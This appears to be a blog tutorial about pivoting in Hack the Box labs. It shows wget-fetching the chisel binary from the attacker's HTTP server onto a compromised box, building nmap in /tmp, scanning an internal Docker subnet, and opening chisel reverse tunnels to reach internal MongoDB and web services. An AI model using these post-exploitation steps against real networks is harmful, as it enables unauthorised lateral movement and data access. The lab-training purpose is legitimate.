Having fun with Hack the Box?
Working on HTB, “port forwarding” is needed in some cases.
So understanding chisel can be very handy.
Here, I w show you how to use chisel, based on my experiences with Hack the Box.
Install chisel on your local & attacking machine
I only tried on Kali Linux. It’s very simple & easy.
Or you can follow instruction on https://github.co.m/jpillora/chisel
When installed, you have chisel, executable file.
As long as you have this file, you can run chisel. No dependencies.
So, how to install chisel on your attacking machine (Box machine)?
Copy that file.
Start http on the directory where chisel exists.(Your local machine)
┌──(kali㉿kali)-[~/workplace]
└─$ ls
chisel
┌──(kali㉿kali)-[~/workplace]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...On attacking machine(box_machine), use wget to copy chisel.
10.10.14.3 is local machine.
www-data@box_machine:/var/www/html/$ wget http://10.10.14.3:8888/chisel
<tml$ wget http://10.10.14.3:8888/chisel
--2022-09-09 09:09:09-- http://10.10.14.3:8888/chisel
Connecting to 10.10.14.3:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length:999 [application/octet-stream]
Saving to: 'chisel'
0K 100% 999K=0s
2022-09-09 09:09:09 (999 KB/s) - 'chisel' saved [999/999]┌──(kali㉿kali)-[~/workplace]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.11.167 - - [09/Sep/2022 09:09:09] "GET /chisel HTTP/1.1" 200 -Don’t forget to give permission to execute.
chmod 700 chiselrunning nmap on attacking machine
When there’s some dockers running, you want to run nmap on your attaching machine.
Then you w find some open ports, which are not available from your local machine.
Here’s how to install nmap on your attacking machine (linux), when you don’t have root permission.
- get nmap binary from https://nmap.org/download.html . In my case, it’s nmap-7.93.tar.bz2 was the “Latest stable Nmap release tarball”. DL to your local machine.
- Send it to attacking machine, like we did with chisel.
- I copied it to /tmp, since the user I was using(www-data) did not have home directory. /tmp was the only safe directory that user could write to.
- configure & install. “–prefix=/tmp” because of limited permission of the user. By default , it is installed on /usr/local something, but in this case, it w fail as there’s no root user available.
bzip2 -cd nmap-7.93.tar.bz2 | tar xvf -
cd nmap-7.93
./configure --prefix=/tmp
make
make installThen we have /tmp/bin/nmap.
Use it like regular nmap.
/tmp/bin/nmap -p 0-34000 172.17.0.0/24Setting port forwarding with chisel
Let’s assume that we find ports open from nmap.
1st one is as below.
Nmap scan report for 172.17.0.4
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT STATE SERVICE
27017/tcp open mongodOn your local machine, start chisel server.
┌──(kali㉿kali)-[~/workplace]
└─$ ./chisel server -p 7777 --reverseport 7777 can be something else. As log as it’s not used by other processes.
On attacking machine,
./chisel client 10.10.14.3:7777 R:127.0.0.1:3000:172.17.0.4:27017Then from local machine, open new connection and access to this “172.17.0.4:27017”
┌──(kali㉿kali)-[~/workplace]
└─$ mongo --host 127.0.0.1:3000
MongoDB shell version v5.3.1
connecting to: mongodb://127.0.0.1:3000/?compressors=disabled&gssapiServiceName=mongodb
~~
> show databases;
admin 0.000GB
config 0.000GB
local 0.000GBHere is another sample.
Nmap scan report for 172.17.0.5
Host is up (0.00017s latency).
Not shown: 34000 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open httpServer side is same as above.
┌──(kali㉿kali)-[~/workplace]
└─$ ./chisel server -p 7777 --reverseOn attacking machine,
./chisel client 10.10.14.3:7777 R:127.0.0.1:3000:172.17.0.5:80If you still have chisel running, kill the process before running a new one, since same ports are used.
Then on your local machine, open web browser like FireFox and access
127.0.0.1:3000Then you can open 172.17.0.5:80 website.
Fin
